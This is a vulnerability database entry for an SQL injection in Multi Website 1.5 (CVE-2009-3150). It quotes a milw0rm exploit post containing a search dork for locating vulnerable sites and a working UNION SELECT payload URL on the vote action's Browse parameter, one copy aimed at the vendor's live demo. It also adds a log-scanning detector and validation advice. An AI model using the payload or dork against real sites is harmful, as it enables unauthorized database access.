Multi Website SQL Injection Vulnerability

Vulnerability ID: 1118231
Vulnerability type: SQL injection
Published: 2009-08-03
Updated: 2009-08-05
CVE ID: CVE-2009-3150
CNNVD-ID: CNNVD-200909-203
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/9344
https://www.securityfocus.com/bid/43243
https://cxsecurity.com/issue/WLB-2009090128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200909-203
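|Vulnerability details
A SQL injection vulnerability exists in index.php of MultiWebsite 1.5. A remote attacker can execute arbitrary SQL commands by way of a parameter in a vote action (this entry calls it a "refresh" parameter; the exploit text below passes it as Browse).
|Exploit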
> > [+] Bug : Powered by Multi Website 1.5 (index php action) Remote SQL Injection Vulnerability
> >
> > [+] Script home : http://www.multi-website.com
> >
> > [+] Affected versions : 1.5
> >
> > [+] Solution : nothing .;
> > > >
> > > > =======================================================
> > > >
> > > > ==> AuThOr : SarboT511
> > > >
> > > > ==> EmaiL : xs3@hotmail.com
> > > >
> > > > ==> HomE : www.lezr.com
> > > >
> > > > ==> DorK : Powered by Multi Website 1.5
> > > >
> > > > ==> Control panel script : http://localhost/[path]/admin/login.php
> > > >
> > > > ========================================================
> > > >
> > > > ==> ExplO!t :
> > > >
> > > > www.target.com/[path]/?action=vote&Browse=-1+union+select+1,@@version--
> > > >=========================================================
> > > > L!VE Demo :
> > > >
> > >  http://www.multi-website.com/demo/?action=vote&Browse=-1+union+select+1,@@version--
> > =============================================================
> > greats to : his0k4 , The g0bL!n , black zero , thirdd_Devil ,devil
> > fucker ,3loosh_al7rbi ,HCj , ALM 511 , all members [ lezr.com ] .#

# milw0rm.com [2009-08-03]
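
The request shape shown in the advisory above (`action=vote` with a `Browse` value that is not a number) can be searched for in web server access logs. The following is an added example, not part of the original advisory or of the Multi Website code base; it assumes Common/Combined Log Format logs and that a legitimate `Browse` value is a plain non-negative integer, and the function name and sample log lines are constructed here.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a Common/Combined Log Format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate Browse value is a plain non-negative integer.
INTEGER_RE = re.compile(r"\d+")


def flag_vote_requests(log_lines):
    """Return (client, browse_value) for vote requests whose Browse is not an integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target = m.groups()
        # parse_qs percent-decodes and turns '+' into a space, as PHP does for $_GET.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if "vote" not in params.get("action", []):
            continue
        for value in params.get("Browse", []):
            if not INTEGER_RE.fullmatch(value):
                hits.append((client, value))
    return hits


# Constructed sample lines (documentation IP ranges); the second reuses the
# query string quoted in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Aug/2009:10:00:01 +0000] "GET /site/?action=vote&Browse=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [03/Aug/2009:10:00:05 +0000] "GET /site/?action=vote&Browse=-1+union+select+1,@@version-- HTTP/1.1" 200 4870',
    '192.0.2.44 - - [03/Aug/2009:10:00:09 +0000] "GET /site/?action=news&id=3 HTTP/1.1" 200 2301',
]

if __name__ == "__main__":
    for client, value in flag_vote_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer Browse value: {value!r}")
```

The same allow-list check (accept `Browse` only when it is an integer) is the input validation the application would need before the value reaches a query.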
|Affected products
OUONGROUP Multi Website 1.5
|References

Source: VUPEN
Name: ADV-2009-2132
Link: http://www.vupen.com/english/advisories/2009/2132
Source: MILW0RM
Name: 9344
Link: http://www.milw0rm.com/exploits/9344
Source: SECUNIA
Name: 36107
Link: http://secunia.com/advisories/36107